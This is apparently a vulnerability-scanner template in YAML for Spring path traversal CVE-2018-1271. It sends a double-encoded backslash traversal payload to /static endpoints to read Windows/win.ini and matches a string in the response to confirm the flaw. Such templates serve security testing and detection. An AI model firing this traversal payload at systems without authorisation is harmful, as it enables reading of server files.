id: spring-lfi
info:
  name: Spring LFI CVE-2018-1271
  risk: Critical

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'actuator, api, admin, eureka, api/v1'

variables:
  - endpoint: |
      /static
      /spring-rabbit-stock/static

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "for 16-bit app support")


references:
  - link: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf